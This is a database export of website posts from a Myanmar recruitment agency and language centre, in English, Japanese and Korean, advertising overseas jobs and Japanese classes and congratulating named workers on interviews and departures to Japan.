('activities', 0, 29, 223, 'ko', 0, '<p>NEW COMET TRADING AGENCY의 한국 측 담당자인 홍씨가 HIT LANGUAGE CENTER에서 KOSHIPA TEST 평가 결과를 받을 수 있는 시기에 대해 설명했습니다.(8-7-2023)<br><img src=\"/sites/default/files/inline-images/0-02-05-f935a538b3bc910e8946314ccd2ebbcd440d5782d4d6dae79e63820e536c5299_b168dc980f6026aa.jpg\" data-entity-uuid=\"48a96694-743b-4594-a437-fb064c1b9c17\" data-entity-type=\"file\"></p>', '', 'full_html'),
('announcement', 0, 30, 226, 'en', 0, '<p>We urgently need the following skilled workers to work in Singapore</p><p>1. S pass (Visa) Only For Men</p><p>-Position: Project/Operations Coordinator (Degree)<br>- Must be able to speak English well.<br>-Must have good knowledge and understanding of equipment and sales/buying experience<br>- Must have admin experience<br>- By computer (Record keeping, data entry, filing etc.)<br>- BE Mechanical would be more convenient</p><p>2. Work Permit (Visa) Only For Men</p><p>-Position: Admin Support Assistant (Diploma Graduate)<br>- Must be able to speak English well<br>- Must have admin experience<br>-Must have good knowledge and understanding of equipment and sales/buying experience<br>- By computer (Record keeping, data entry, filing etc.)</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491, 095015742, 09965104911,<br>01-8393300, 01-8393344)</p>', '', 'full_html'),
('announcement', 0, 30, 226, 'ja', 0, '<p>以下の熟練労働者をシンガポールで緊急に求めています。</p><p>&nbsp; &nbsp;Sパス（ビザ）男性のみ</p><p>&nbsp; &nbsp;職種：プロジェクト/オペレーションコーディネーター（学士号）<br>&nbsp; &nbsp;英語を流暢に話すことができることが必要です。<br>&nbsp; &nbsp;装置についての良い知識と理解、販売/購買経験が必要です。<br>&nbsp; &nbsp;管理経験が必要です。<br>&nbsp; &nbsp;コンピューターを使った業務（記録保持、データ入力、ファイリングなど）があります。<br>&nbsp; &nbsp;機械工学の学位があれば尚良いです。</p><p>&nbsp; &nbsp;ワークパーミット（ビザ）男性のみ</p><p>&nbsp; &nbsp;職種：アドミンサポートアシスタント（専門学位保持者）<br>&nbsp; &nbsp;英語を流暢に話すことができることが必要です。<br>&nbsp; &nbsp;管理経験が必要です。<br>&nbsp; &nbsp;装置についての良い知識と理解、販売/購買経験が必要です。<br>&nbsp; &nbsp;コンピューターを使った業務（記録保持、データ入力、ファイリングなど）があります。</p><p>NEW COMET TRADING AGENCY CO.,LTD （09775556677、09950947491、095015742、09965104911、<br>01-8393300、01-8393344）</p>', '', 'full_html'),
('announcement', 0, 30, 226, 'ko', 0, '<p>긴급하게 다음과 같은 숙련 노동자들이 싱가포르에서 일할 필요가 있습니다.</p><p>&nbsp; &nbsp;S 패스 (비자) 남성 전용</p><p>&nbsp; &nbsp;직책: 프로젝트/운영 조정자 (학사 학위)<br>&nbsp; &nbsp;영어를 잘 구사할 수 있어야 합니다.<br>&nbsp; &nbsp;장비 및 영업/구매 경험에 대한 좋은 지식과 이해가 필요합니다.<br>&nbsp; &nbsp;행정 업무 경험이 있어야 합니다.<br>&nbsp; &nbsp;컴퓨터 활용 (기록 보관, 자료 입력, 파일 정리 등)<br>&nbsp; &nbsp;기계공학 학사 학위가 있다면 더욱 편리합니다.</p><p>&nbsp; &nbsp;워크 퍼밋 (비자) 남성 전용</p><p>&nbsp; &nbsp;직책: 행정 지원 조수 (전문대학 졸업)<br>&nbsp; &nbsp;영어를 잘 구사할 수 있어야 합니다.<br>&nbsp; &nbsp;행정 업무 경험이 있어야 합니다.<br>&nbsp; &nbsp;장비 및 영업/구매 경험에 대한 좋은 지식과 이해가 필요합니다.<br>&nbsp; &nbsp;컴퓨터 활용 (기록 보관, 자료 입력, 파일 정리 등)</p><p>NEW COMET TRADING AGENCY CO., LTD (09775556677, 09950947491, 095015742, 09965104911,<br>01-8393300, 01-8393344)</p>', '', 'full_html'),
('announcement', 0, 31, 259, 'en', 0, '<p>We are looking for professional Welders who wants to work at Korean Shipyards.&nbsp;<br>1. 3rd Batch of Welding Training Course(Sinmalike) will be opened on (15.8.2023) at Sinmalike Shipyard.<br>2. Korean Language course will cost 150,000 MMKyats for 2 months.&nbsp;<br>3. hose who do not know how to weld and those who have a basic level can attend the course by paying a course fee of 12,500,000. (6 week course from Monday to Friday) South Korea. If experts from the shipyard come to inspect - Interview fee; X-Ray Test fees and Test Center fees must be paid.<br>4. 3G FCAW (Backing) (subject to change) must be X - Ray passed for Welder interview.<br>5. Basic salary W 2,462,000 (approximate) The basic salary may vary from company to company.<br>&nbsp;(Note. After 3 hours of overtime per day and (22) days, the money that will be earned and other living expenses, health and income tax costs are deducted, the remaining amount will be over 500,000 Burmese money.)<br>6. You can go to Korea if only you pass the drug test. (B virus, C virus, TB, venereal disease (HIV) )<br>7. Must be between 20 and 45 years old.<br>8. Must go to Korea with E-73 visa.&nbsp;<br>9.Must work for at least 2 years.<br>10. From a Korean shipyard upon completion of training and proficiency<br>&nbsp; &nbsp; Welding professionals can enter the exam. after passing the exam<br>&nbsp; &nbsp; You will have the opportunity to go to work in Korea.</p><p><br>Contact about Korea<br>09-775556677, 09-5015742, 09-950947491, 01-8393300, 01-8393344, 01-8393393<br>(A 3-2), Chapter 201 Burmese luxury housing Mingal Taung Nyunt Township, Yangon.<br>(Please contact between 9:00 a.m. and 5:00 p.m.)</p>', '', 'full_html'),
('announcement', 0, 62, 409, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: Monday, Tuesday, Wednesday (3 months)</li><li>Time: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK (Excluding Textbook fee)</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: Monday, Tuesday, Wednesday (3 months)</li><li>Time: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK (Excluding Textbook fee)</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;</p><img src=\"/sites/default/files/inline-images/v1_1.jpg\" data-align=\"center\" data-entity-uuid=\"9a640b77-1f27-4315-aabb-ed1b6fa23767\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/v2_0.jpg\" data-align=\"center\" data-entity-uuid=\"0e09f7e4-6346-480c-afcf-bd6e1e27ada1\" data-entity-type=\"file\">', '', 'full_html'),
('announcement', 0, 62, 409, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p><p>日本の新潟大学を卒業した名だたるAye Pa Pa Tun先生と手を取り合いましょう。4年間の専門知識と経験を提供する先生が、あなたの言語学習の旅をサポートします。</p><p>あなたを待つもの：包括的な学習、比類なき成長</p><ul><li>聴解力を磨く</li><li>読解力をマスターする</li><li>文法を磨く</li><li>語彙を拡張する</li><li>複雑な漢字を克服する</li></ul><p>New Comet Trading Agency株式会社と提携し、HIT言語センターは言語学習のサポートだけでなく、トレーニングビザ、特定技能ビザ、学生ビザの貴重な支援を提供します。コース修了時には、あなたの成果を証明する証明書が授与されます。</p><p><br><strong>N4およびN3クラスの詳細を確認</strong></p><p><strong>N4クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：月曜日、火曜日、水曜日（3ヶ月）</li><li>時間：午後1時30分から午後3時30分</li><li>料金：200,000 MMK (教科書料金を除く)</li><li>コース教材：みんなの日本語、漢字日本語チャレンジ、スピードマスター読解、スピードマスター聴解 、日本語能力試験 JLPT Old Questions！</li></ul><p><strong>N3クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：月曜日、火曜日、水曜日（3ヶ月）</li><li>時間：午後3時30分から午後5時30分</li><li>料金：250,000 MMK (教科書料金を除く)</li><li>コース教材：総まとめ漢字、新総合マスター読解、新総合マスター聴解、新総合マスター文法、N3単語2000、合格できるN3旧問題など。</li></ul><p>文化、ビジネス、成長の言葉を抱きしめるこの黄金の機会をお見逃しなく。HIT言語センターのファミリーに参加し、可能性の世界を開いてください。今すぐ登録し、言語の達成に向けた扉を開けましょう！</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: newcometagency@gmail.com</p><p>Website: www.newcomettradingagency.com&nbsp;</p><img src=\"/sites/default/files/inline-images/v1_0.jpg\" data-align=\"center\" data-entity-uuid=\"462590b5-5d2f-431d-b50a-3efee62ade42\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/v2.jpg\" data-align=\"center\" data-entity-uuid=\"935c09db-5837-4a1f-8ef6-e63f9ec2e423\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 66, 420, 'en', 0, '<p><strong>&nbsp;Exciting News for Japanese Language Enthusiasts!&nbsp;</strong></p><p>Dear language learners and enthusiasts,</p><p>For those eager to embark on a journey to learn Japanese from the very basics, we are thrilled to announce the launch of our outdoor courses starting this January!&nbsp;</p><p>&nbsp;<strong>Course Highlights:</strong></p><ul><li>Perfect for individuals desiring a systematic approach to learning Japanese.</li><li>In partnership with a licensed agency, ensuring a reliable and authentic learning experience.</li><li>Abundant job opportunities await those who seize this chance. Don\'t miss out on the possibilities!&nbsp;</li></ul><p>&nbsp;<strong>Pricing:</strong></p><ul><li>Basic + N5 Class: 180,000</li><li>N4 + Exam Practice Class: 200,000</li><li>Basic N5 + N4 Combo: Special price of 350,000 when enrolled together</li></ul><p><strong>Course Details:</strong></p><ol><li><strong>Basic + N5 Class</strong><ul><li>Duration: 3 months</li><li>Includes textbook and dress</li></ul></li><li><strong>N4 Class</strong><ul><li>Duration: 3 months</li><li>Includes textbook and dress</li></ul></li></ol><p><strong>Why Choose New Comet?</strong></p><ul><li>Comprehensive learning from N5 level and beyond.</li><li>Future courses, including Tokutei and small restaurant classes, are in the pipeline—stay tuned for more exciting opportunities!</li></ul><p><strong>Enroll Now and Secure Your Spot!</strong></p><p>Whether you are a beginner or looking to enhance your Japanese language skills, New Comet is the place to be. Join us for a vibrant learning experience that goes beyond the classroom!</p><p>For further details and enrollment, please visit our website or contact us directly. Let\'s embark on this language-learning adventure together!</p><img src=\"/sites/default/files/inline-images/asdf_0.jpg\" data-entity-uuid=\"b5b24a40-ac5a-4524-8f41-dbc338cf31b9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/gfjk.jpg\" data-entity-uuid=\"7cf51b8b-8e2d-477a-96d0-38ce8934a486\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 67, 421, 'ja', 0, '<div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start gap-3 whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 overflow-x-auto\" data-message-author-role=\"assistant\" data-message-id=\"35b89d3e-0921-436b-ab27-82bc2cb137b8\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><p><strong>Wishing Everyone a Happy New Day!&nbsp;</strong></p><p>At New Comet Agency, we\'re committed to providing practical Japanese language instruction to ensure that children who have successfully passed restaurant interviews in Japan don\'t have to pretend they don\'t know Japanese.</p><p>Our experienced teachers have been conducting group work and role-playing sessions in the kitchen, guiding the children through hands-on learning experiences.</p><p>It brings us immense joy to witness the dedication and hard work of the children as they immerse themselves in learning.&nbsp;</p></div></div></div><p><img src=\"/sites/default/files/inline-images/kitchen1.jpg\" data-entity-uuid=\"e4eddb02-06a2-4b5c-bd14-02b604e3dc82\" data-entity-type=\"file\"></p><img src=\"/sites/default/files/inline-images/k2.jpg\" data-entity-uuid=\"d47065e6-2df0-45bc-815c-8368a7a89e79\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k3.jpg\" data-entity-uuid=\"9b97ccad-342f-4253-addb-1c82dddd9b59\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k4.jpg\" data-entity-uuid=\"733c4be4-b6a8-4440-9dd7-1811bdefb3e8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k5.jpg\" data-entity-uuid=\"71edfa87-7ce7-4924-890a-7bf612752fe6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k6.jpg\" data-entity-uuid=\"05645857-d0bf-4dfb-9b4d-77b25ba91e4a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k7.jpg\" data-entity-uuid=\"b8ffb27c-c647-4887-9807-054540a83372\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k8.jpg\" data-entity-uuid=\"9f9ea7b6-f9a0-4cc0-92da-c52350fa6a25\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k9.jpg\" data-entity-uuid=\"930afec0-6eb6-41ab-b244-9ebb4f28e578\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k10.jpg\" data-entity-uuid=\"8f75ca05-f487-4b08-b809-7c6ce2597b71\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/k11.jpg\" data-entity-uuid=\"4c413184-0079-4ee4-8f6a-9cd8ea4f2ed1\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 68, 424, 'en', 0, '<blockquote><h2><strong>Congratulations !</strong></h2></blockquote><p><strong>Congratulations HNIN WAI WAI NWE &amp; THIDA KHINE &nbsp;for departing to JAPAN , HOKKAIDO City with Food Service (Restaurant) Job at (22/4/2024).&nbsp;</strong></p><p><img src=\"/sites/default/files/inline-images/11.jpg\" data-entity-uuid=\"2f03d202-de51-47b7-ae4b-7e1c716e4ae8\" data-entity-type=\"file\"></p><img src=\"/sites/default/files/inline-images/22.jpg\" data-entity-uuid=\"177c6990-58c0-479a-9165-fe7d3c7bf2e5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/33.jpg\" data-entity-uuid=\"410bcaaa-19e7-485e-b1fc-5ded63a9d07b\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 68, 424, 'ja', 0, '<blockquote><h2><strong>おめでとうございます!</strong></h2></blockquote><p><strong>HNIN WAI WAI NWE と THIDA KHINE が、2024 年 4 月 22 日に食品サービス (レストラン) の仕事に就いて日本、北海道へ出発することになりました。おめでとうございます。</strong></p><p><img src=\"/sites/default/files/inline-images/11.jpg\" data-entity-uuid=\"2f03d202-de51-47b7-ae4b-7e1c716e4ae8\" data-entity-type=\"file\"></p><img src=\"/sites/default/files/inline-images/22.jpg\" data-entity-uuid=\"177c6990-58c0-479a-9165-fe7d3c7bf2e5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/33.jpg\" data-entity-uuid=\"410bcaaa-19e7-485e-b1fc-5ded63a9d07b\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 69, 426, 'en', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>September 4, 2024, the first from NEW COMET Agency to Akita, Japan</p><p>I am proud of the eight person who cherish their ancestors and work hard, congratulations.</p><p>May everything go well.</p><p>Good luck in Japan.</p><p>Thank you all to those who trusted us and cooperated with us.</p><p>I will send you to Japan with more work requests, so please trust me and work for NEW COMET Agency.</p><img src=\"/sites/default/files/inline-images/11_1.jpg\" data-entity-uuid=\"02bd8861-4f61-4ce8-8859-0ee9ba68de94\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/22_1.jpg\" data-entity-uuid=\"75ed6f67-e3fe-490c-80d3-782cbbedcf72\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/33_1.jpg\" data-entity-uuid=\"82869cd0-2f21-4d96-b346-6e7f6d1544a6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/44_0.jpg\" data-entity-uuid=\"a504beda-28d7-4fdb-acd9-364f125b7ebf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/55_0.jpg\" data-entity-uuid=\"5c819877-3f4f-486f-9b3c-ec107c7b9f65\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/66_0.jpg\" data-entity-uuid=\"bf63784b-8078-4f41-982c-98ed8a088b63\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/77_0.jpg\" data-entity-uuid=\"9b1cc0fa-44d1-4d10-8a35-b2d8d5eb6a12\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 69, 426, 'ja', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>2024年9月4日、NEW COMET Agency から日本の秋田への最初の<br>先祖を大切に仕事に取り組む8人の姉妹を誇りに思います、おめでとうございます。</p><p>すべてがうまくいきますように<br>日本でも頑張ってください。<br>私たちを信頼して協力してくれた姉妹たちに感謝します 。<br>さらなる仕事の依頼とともにあなたを日本に送りますので、私を信じてNEW COMET Agencyで働いてください。</p><img data-entity-uuid=\"02bd8861-4f61-4ce8-8859-0ee9ba68de94\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/11_1.jpg\"><img data-entity-uuid=\"75ed6f67-e3fe-490c-80d3-782cbbedcf72\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/22_1.jpg\"><img data-entity-uuid=\"82869cd0-2f21-4d96-b346-6e7f6d1544a6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/33_1.jpg\"><img data-entity-uuid=\"a504beda-28d7-4fdb-acd9-364f125b7ebf\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/44_0.jpg\"><img data-entity-uuid=\"5c819877-3f4f-486f-9b3c-ec107c7b9f65\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/55_0.jpg\"><img data-entity-uuid=\"bf63784b-8078-4f41-982c-98ed8a088b63\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/66_0.jpg\"><img data-entity-uuid=\"9b1cc0fa-44d1-4d10-8a35-b2d8d5eb6a12\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/77_0.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 70, 430, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations to TIN ZAR WIN MYINT for passing the Interview for Tokutei Gaishoku (Restaurant) !</p><img src=\"/sites/default/files/inline-images/tin%20zar%20win%20myint.jpg\" data-entity-uuid=\"d814db09-311c-4d54-a43b-9e944510fa92\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 70, 430, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>特定外食（レストラン）の面接に合格したTIN ZAR WIN MYINTさん、おめでとうございます！</p><img src=\"/sites/default/files/inline-images/tin%20zar%20win%20myint.jpg\" data-entity-uuid=\"d814db09-311c-4d54-a43b-9e944510fa92\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 71, 431, 'en', 0, '<blockquote><p>Congratulations!!</p></blockquote><p>Congratulations to EI EI WAI for passing the interview for Tokutei Gaishoku (Restaurant)</p><img src=\"/sites/default/files/inline-images/EI%20EI%20WEI.jpg\" data-entity-uuid=\"7220ef82-d2b1-4c93-80a5-cc42e6a69132\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 71, 431, 'ja', 0, '<blockquote><p>おめでとうございます！</p></blockquote><p>特定外食（レストラン）の面接に合格したEI EI WAEI EI WAIさん、おめでとうございます！</p><img src=\"/sites/default/files/inline-images/EI%20EI%20WEI.jpg\" data-entity-uuid=\"7220ef82-d2b1-4c93-80a5-cc42e6a69132\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 72, 435, 'en', 0, '<blockquote><h2>Congratulations!!</h2></blockquote><p>Congratulations to YAW CHANG for passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 72, 435, 'ja', 0, '<blockquote><h2>おめでとうございます!!</h2></blockquote><p>特定外食（レストラン）の面接に合格したYAW CHANYAW CHANGさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 73, 439, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations for&nbsp;</p><ol><li>KHIN KHIN KYAW</li><li>THET MYAT MYAT KHAING</li><li>WIN PYAE SHAN</li><li>HNIN THAZIN AUNG</li><li>YU YA NWAY</li></ol><p>For Departing to JAPAN, TOKYO with Tokueti Gaishoku (Restaurant) Job!&nbsp;</p><p>Have A safe Flight !&nbsp;</p><img><img data-entity-uuid=\"251d0d0b-e02b-4f4e-b008-c88aa598687e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/33_2.jpg\"><img data-entity-uuid=\"15767dc3-645d-4974-a641-d572f32a108f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/44_1.jpg\"><img data-entity-uuid=\"8bbf0b1b-586f-4a0c-93ee-d30e55e4a5bb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/55_1.jpg\">', '', 'full_html'),
('activities', 0, 73, 439, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>おめでとうございます。</p><ol><li>KHIN KHIN KYAW</li><li>THET MYAT MYAT KHAING</li><li>WIN PYAE SHAN</li><li>HNIN THAZIN AUNG</li><li>YU YA NWAY</li></ol><p>特恵外食（レストラン）の仕事のため、東京へ出発！</p><p>安全な旅を祈ります！</p><p><img><img src=\"/sites/default/files/inline-images/33_2.jpg\" data-entity-uuid=\"251d0d0b-e02b-4f4e-b008-c88aa598687e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/44_1.jpg\" data-entity-uuid=\"15767dc3-645d-4974-a641-d572f32a108f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/55_1.jpg\" data-entity-uuid=\"8bbf0b1b-586f-4a0c-93ee-d30e55e4a5bb\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 74, 440, 'en', 0, '<blockquote><h2>Congratulations！</h2></blockquote><p>Congratulations to KYAW NAING in passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 74, 440, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>特定外食（レストラン）の面接に合格したKYAW NAINGさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 75, 448, 'en', 0, '<blockquote><h2>Congratulations!!</h2></blockquote><p>Congratulations to CHIT SAYAH OO in passing interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 75, 448, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>特定外食（レストラン）の面接に合格したCHITT SAYAR OOさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 76, 447, 'en', 0, '<blockquote><p><strong>CONGRATULATIONS!&nbsp;</strong></p></blockquote><p><strong>Congratulations for NAN SU KHAING &amp; WUT YEE AUNG for departure to JAPAN, NAGASAKI !&nbsp;</strong></p><img data-entity-uuid=\"2b8b4015-d243-4566-8664-b3e6574ae047\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/22_3.jpg\"><img data-entity-uuid=\"a1c86943-2e50-47aa-83b2-db73ec23321d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/33_3.jpg\"><img data-entity-uuid=\"0f58c1ec-5fd6-42a6-ace4-6b1669b714e6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/44_2.jpg\"><img data-entity-uuid=\"876dbb5d-1b69-44a8-b5f1-26eda0c8b7eb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/viber_image_2024-06-25_14-12-23-830.jpg\">', '', 'full_html'),
('activities', 0, 76, 447, 'ja', 0, '<blockquote><h2>おめでとうございます!</h2></blockquote><p><strong>NAN SU KHAING と WUT YEE AUNG の日本、長崎への出発おめでとうございます！</strong></p><img src=\"/sites/default/files/inline-images/22_3.jpg\" data-entity-uuid=\"2b8b4015-d243-4566-8664-b3e6574ae047\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/33_3.jpg\" data-entity-uuid=\"a1c86943-2e50-47aa-83b2-db73ec23321d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/44_2.jpg\" data-entity-uuid=\"0f58c1ec-5fd6-42a6-ace4-6b1669b714e6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/viber_image_2024-06-25_14-12-23-830.jpg\" data-entity-uuid=\"876dbb5d-1b69-44a8-b5f1-26eda0c8b7eb\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 77, 450, 'en', 0, '<blockquote><p><strong>CONGRATULATIONS!</strong></p></blockquote><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>25-6-2024 While accompanying 3 workers who will go to work at a large restaurant in Tokyo, Japan.&nbsp;</strong></span></p><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>Congratulations to AUNG ZIN OO, HNIN EI PHYU &amp; EI SHWE ZIN !</strong></span></p><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>- Take care of your health&nbsp;</strong></span></p><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>- Strictly follow working hours</strong></span></p><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>&nbsp;-Treat work as if it were your own work and work hard to do it&nbsp;</strong></span></p><p><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\"><strong>- Learn to understand Japanese culture</strong></span></p><img data-entity-uuid=\"3a6b8a5f-2bdf-4db9-94e2-12d30445c28e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/11_3.jpg\"><img data-entity-uuid=\"53b33498-3201-4e1e-a61c-2be24dca4a65\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/22_4.jpg\"><img data-entity-uuid=\"883fcbe3-231b-464a-ac43-3853c7e963ac\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/33_4.jpg\"><img data-entity-uuid=\"91d3425d-8fa0-4d06-ac23-d00230c03826\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/44_3.jpg\">', '', 'full_html'),
